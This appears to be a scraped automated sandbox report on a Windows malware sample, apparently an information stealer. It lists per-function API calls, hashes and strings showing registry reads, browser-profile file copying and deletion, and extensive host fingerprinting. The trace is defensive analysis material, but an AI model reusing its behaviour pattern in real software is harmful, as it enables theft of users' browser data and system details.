Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91

Function 0040A7D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(02D3DFF8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,004102B3), ref: 0040A7ED
LoadLibraryA.KERNEL32(02D3B778,?,?,?,?,?,?,?,?,?,?,?,004102B3), ref: 0040A876

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D3E158,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

SetEnvironmentVariableA.KERNEL32(02D3DFF8,00000000,00000000,?,0042137C,?,004102B3,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00420B0A), ref: 0040A862

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040A7E2, 0040A7F6, 0040A80C

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-2812842227
Opcode ID: 53739a10049ce506283cd6aa5afa3777e241aeeb27d13ba76a4ac47b81e10f57
Instruction ID: e2f153a25b0241b5b599166127738bab9ecbab10861abf647739b816a1383ce1
Opcode Fuzzy Hash: 53739a10049ce506283cd6aa5afa3777e241aeeb27d13ba76a4ac47b81e10f57
Instruction Fuzzy Hash: 63415BB1E0A2049BC704EBA5EC55BAE37B6AB08305F44552BF505A32E0FB386954CB67

Function 0040A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D41C70,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
lstrlenA.KERNEL32(00000000), ref: 0040ADEC

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

DeleteFileA.KERNEL32(00000000), ref: 0040AE73

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: ffcd8b69c6fdf76a510d55cdac9836ca52077d968958f930e1f30557e74df526
Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
Opcode Fuzzy Hash: ffcd8b69c6fdf76a510d55cdac9836ca52077d968958f930e1f30557e74df526
Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A

Function 0040D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D41C70,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
lstrlenA.KERNEL32(00000000), ref: 0040DA9F
lstrlenA.KERNEL32(00000000), ref: 0040DAB3
DeleteFileA.KERNEL32(00000000), ref: 0040DB32

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 472a6ae39dfc647cd6dd5970559b4babc11ffc31b7a221571969e697a7b1930a
Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
Opcode Fuzzy Hash: 472a6ae39dfc647cd6dd5970559b4babc11ffc31b7a221571969e697a7b1930a
Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A

Function 0040F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
lstrlenA.KERNEL32(00000000), ref: 0040F66B

Strings

^userContextId=4294967295, xrefs: 0040F69C
moz-extension+++, xrefs: 0040F6AD

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 7a1f78bbb09cb77547938d9bfd9c02b0695267f6e0cddebe26e222741be27e5f
Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
Opcode Fuzzy Hash: 7a1f78bbb09cb77547938d9bfd9c02b0695267f6e0cddebe26e222741be27e5f
Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A

Function 00411C60 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00417690: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
Part of subcall function 00417690: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
Part of subcall function 00417690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
Part of subcall function 00417690: HeapAlloc.KERNEL32(00000000), ref: 0041779A

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 00417820: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
Part of subcall function 00417820: HeapAlloc.KERNEL32(00000000), ref: 0041783B

Part of subcall function 00417950: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,02D45ED0,00000000,?), ref: 00417982
Part of subcall function 00417950: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,02D45ED0,00000000,?), ref: 00417989

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 00417B10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
Part of subcall function 00417B10: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
Part of subcall function 00417B10: GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
Part of subcall function 00417B10: wsprintfA.USER32 ref: 00417B83

Part of subcall function 00417BC0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02D456C8,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
Part of subcall function 00417BC0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02D456C8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
Part of subcall function 00417BC0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02D456C8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D

Part of subcall function 00417C90: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,02D456C8,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417CC5

Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
Part of subcall function 00417D20: LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
Part of subcall function 00417D20: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
Part of subcall function 00417D20: LocalFree.KERNEL32(00000000), ref: 00417EB2

Part of subcall function 00417F10: GetSystemPowerStatus.KERNEL32(?), ref: 00417F3D

GetCurrentProcessId.KERNEL32(00000000,?,02D46030,00000000,?,00420E0C,00000000,?,00000000,00000000,?,02D45710,00000000,?,00420E08,00000000), ref: 004122CE

Part of subcall function 00419600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
Part of subcall function 00419600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
Part of subcall function 00419600: CloseHandle.KERNEL32(00000000), ref: 0041963F

Part of subcall function 00417F90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
Part of subcall function 00417F90: HeapAlloc.KERNEL32(00000000), ref: 00417FCE
Part of subcall function 00417F90: RegOpenKeyExA.KERNEL32(80000002,02D41378,00000000,00020119,?), ref: 00417FEE
Part of subcall function 00417F90: RegQueryValueExA.KERNEL32(?,02D45EF0,00000000,00000000,000000FF,000000FF), ref: 0041800F
Part of subcall function 00417F90: RegCloseKey.ADVAPI32(?), ref: 00418022

Part of subcall function 004180F0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00418159
Part of subcall function 004180F0: GetLastError.KERNEL32 ref: 00418168

Part of subcall function 00418060: GetSystemInfo.KERNEL32(00420E14), ref: 00418090
Part of subcall function 00418060: wsprintfA.USER32 ref: 004180A6

Part of subcall function 00418290: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02D45830,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
Part of subcall function 00418290: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02D45830,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
Part of subcall function 00418290: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418302
Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418310
Part of subcall function 00418290: wsprintfA.USER32 ref: 0041833C

Part of subcall function 00418950: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
Part of subcall function 00418950: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
Part of subcall function 00418950: wsprintfA.USER32 ref: 004189E0

Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,02D43510,00000000,00020019,00000000,004205BE), ref: 00418534

Part of subcall function 004184B0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
Part of subcall function 004184B0: wsprintfA.USER32 ref: 004185E9
Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 0041861C
Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 00418810: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
Part of subcall function 00418810: Process32First.KERNEL32(?,00000128), ref: 0041886E
Part of subcall function 00418810: Process32Next.KERNEL32(?,00000128), ref: 00418883
Part of subcall function 00418810: CloseHandle.KERNEL32(?), ref: 004188F1

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004128AB

Strings

aA, xrefs: 004128D4, 00412902, 004128D7

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID: aA
API String ID: 2204142833-2414573348
Opcode ID: 54a2d9ddf39131f754021601aae43517bb2c03111623f776a5016b4919063590
Instruction ID: 4f79722ab1709daed6719e9a1a5ed0a8a89ced1591e892962b9c5cf472760468
Opcode Fuzzy Hash: 54a2d9ddf39131f754021601aae43517bb2c03111623f776a5016b4919063590
Instruction Fuzzy Hash: 9872ED72D15058AACB19FB91ECA1EEE733DAF10314F5042DFB11662056EF343B98CA69

Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D3E158,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,02D3E158,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

